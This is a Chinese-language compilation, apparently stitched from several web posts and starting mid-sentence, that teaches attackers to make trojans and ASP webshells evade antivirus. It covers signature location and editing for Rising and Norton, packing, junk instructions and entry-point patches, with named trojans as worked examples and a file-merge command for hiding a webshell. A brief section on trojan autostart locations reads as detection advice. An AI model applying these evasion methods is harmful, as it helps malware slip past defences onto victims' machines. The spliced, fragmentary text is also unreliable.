X壳的头文件打乱,从而达到免杀效果.六.修改文件特征码免杀法:1.用到工具:特征码定位器,OllyDbg2.特点:操作较复杂,要定位修改一系列过程,而且只针对每种杀毒软件的免杀,要达到多种杀毒软件的免杀,必需修改各种杀毒软件的特征码.但免杀效果好.3.操作要点:对某种杀毒软件的特征码的定位到修改一系列慢长过程.第四部分:快速定位与修改瑞星内存特征码一.瑞星内存特征码特点:由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便.二定位与修改要点:1>.首先用特征码定位器大致定位出瑞星内存特征码位置2>.然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.第五部分:木马免杀综合方案修改内存特征码--->1>入口点加1免杀法---> 1>加压缩壳--->1>再加壳或多重加壳2>变化入口地址免杀法 2>加生僻壳 2>加壳的伪装.3>加花指令法免杀法 3>打乱壳的头文件4>修改文件特征码免杀法注:这个方案可以任意组合各种不同的免杀方案.并达到各种不同的免杀效果.第六部分:免杀方案实例演示部分1.完全免杀方案一:(灰鸽子VIP2.0)内存特征码修改+ 加UPX壳+ 秘密行动工具打乱UPX壳的头文件.2.完全免杀方案二:(findpass)内存特征码修改+ 加压缩壳+ 加壳的伪装3.完全免杀方案三:内存特征码修改+ 修改各种杀毒软件的文件特征码+ 加压缩壳4.完全免杀方案四:内存特征码修改+ 加花指令+ 加压缩壳5.完全变态免杀方案五:内存特征码修改+ 加花指令+ 入口点加1 + 加压缩壳UPX + 打乱壳的头文件还有其它免杀方案可根据第五部分任意组合.暗黑网络YY496342。

常见的ASP木马免杀方法-电脑资料1.加密法常用的是用微软的源码加密工具screnc.exe，以此来躲开杀毒软件的追杀，。

优点是见效明显，一般的有害代码用此法加密后，可以存在于服务器上，发挥原有的功能.缺点是代码经过加密后，是不可识别字符，自己也不认识了。

2.大小写转换法把被杀程序里的代码，大小写稍作转换.可以躲过一般的杀毒软件。

（WORD可以转换大小写，这招对ASPX木马免杀很管用）。

3.混水摸鱼法这种方法也常奏效.fso写成"f"&vbs&"s"&vbs&"o"，运行的结果是一样的，但文件却可以逃过杀毒软件的查杀。

4.图片法或组合法把代码保存为*.jpg,引用,这样，也可以躲过一劫.把很多个代码分配到1.asp,2.asp,3.asp...中，再通过#include合并起来，可逃过and 条件的杀毒软件。

5.移位,逆位,添零法这种方法也属于加密，可以用伟跟冰狐的作品。

6.asp结构特征法在程序开头跟结尾加上图片数据库之类的特征码，改变本身结构。

无论是删除一些特征，还是颠倒顺序只要能正常使用即可。

以前用screnc.exe加密都被杀了，其实网上好多加密软件都是利用这个小东西加密的。

看来这种方法现在是行不通了。

现在比较流行的就是移位、逆位、添零等。

有能力的朋友可以定位下杀毒软件的特征码或者自己编写修改。

有时候把里边的东西文字改改换换位置跟语法也能躲过查杀。

其实我感觉破坏asp的结构性是最好的免杀方法。

也看了许多文章，其中有在asp开头加入图片特征码躲过查杀，不过这种方法有的时候是没用的，于是便想起了可以改变成数据库结构。

这种工具网上也有的，不过是用来欺骗动网后台备份的。

我以原版海阳顶端木马为例，首先把ASP木马合并成数据库（copy X.mdb+X.asp X.asp），使用杀毒软件查杀，可以躲过瑞星2006、卡巴斯基反病毒6.0、Kv2006、McAfee。

木马万能查杀清除方法，木马专杀查杀木马，最关键的还是要知道“木马”的工作原理。

相信你看了这篇文章之后，就会成为一名查杀“木马”的高手了。

1、“木马”万能查杀法“木马”程序会想尽一切办法隐藏自己，主要途径有：在任务栏中隐藏自己，这是最基本的办法。

只要把Form的Visible属性设为False，ShowInTaskBar设为False，程序运行时就不会出现在任务栏中了。

在任务管理器中隐形：将程序设为“系统服务”可以很轻松地伪装自己。

当然它也会悄无声息地启动，黑客当然不会指望用户每次启动后点击“木马”图标来运行服务端，“木马”会在每次用户启动时自动装载。

Windows系统启动时自动加载应用程序的方法，“木马”都会用上，如：启动组、Win.ini、System.ini、注册表等都是“木马”藏身的好地方。

下面具体谈谈“木马”是怎样自动加载的。

在Win.ini文件中，在[WINDOWS]下面，“run=”和“load=”是可能加载“木马”程序的途径，必须仔细留心它们。

一般情况下，它们的等号后面应该什么都没有，如果发现后面跟有路径与文件名不是你熟悉的启动文件，你的计算机就可能中“木马”了。

当然你也得看清楚，因为好多“木马”，如“AOL Trojan木马”，它把自身伪装成command.exe(真正的系统文件为)文件，如果不注意可能不会发现它不是真正的系统启动文件(特别是在Windows窗口下)。

在System.ini文件中，在[BOOT]下面有个“shell=文件名”。

正确的文件名应该是“explorer.exe”，如果不是“explorer.exe”，而是“shell= explorer.exe程序名”，那么后面跟着的那个程序就是“木马”程序，就是说你已经中“木马”了。

注册表中的情况最复杂，通过regedit命令打开注册表编辑器，在点击至：“HKEY-LOCAL-MACHINESoftwareMicrosoftWindowsCurrentVersionRun”目录下，查看键值中有没有自己不熟悉的自动启动文件，扩展名为EXE，这里切记：有的“木马”程序生成的文件很像系统自身文件，想通过伪装蒙混过关，如“Acid Battery v1.0木马”，它将注册表“HKEY-LOCAL-MACHINESO FTWAREMicrosoftWindowsCurrentVersionRun”下的Explorer键值改为Explorer= “C:WINDOWSexpiorer.exe”，“木马”程序与真正的Explorer 之间只有“i”与“l”的差别。

木马免杀几个方法操作步骤：第一步：用OD载入，来到程序的入口点。

第二步：把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞星的表面查杀。

绝招二：快速定位与修改瑞星内存特征码原理：因为目前的内存查杀杀毒软件，只有瑞星才能威胁到我们的木马。

也就是说只要搞定瑞星的内存查杀，那我们的木马在内存就畅通无阻了.但由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,这样对我们的定位和修改带来了方便.操作步骤:第一步:首先用特征码定位器大致定位出瑞星内存特征码位置.第二步:然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.绝招三:如何快速躲过诺顿的查杀诺顿的查杀特点:大家有时候会发现,通过改特征码,加花指令,改内存特征码,等等,卡巴,江民,金山,瑞星都过了,但无论如何都过不了诺顿,这时候是不是感到很纳闷.其实诺顿特征码的定义和其它杀毒软件不一样,其它杀毒软件的特征码都在代码段而只有它把特征码定义在PE头文件里面.而在头文件里面,一般都用字符串作为病毒特征码,知道了原理,就有下面的二种方法来应付.方法一:只要把头文件的字符串的大小字互换一下就可以搞定了.方法二:有二款压缩软件WinUpack和北斗星,经过他们的压缩,会把我们的木马程序的头文件改的面目全非.所以把我们的木马做好其它的杀毒软件的免杀后,再用这二款压缩软件的压缩就可以躲过诺顿的查杀.绝招四:一个不太通用的免杀方法免杀方法一:把入口点第三句开始的几行(20字节内)汇编代码移到零区域去执行,也达到一定的免杀效果.绝招五:用VC++加了花指令后入口点下移法操作过程:加花指令后,可以把入口点下移好一位,这样可以进一步达到免杀效果.。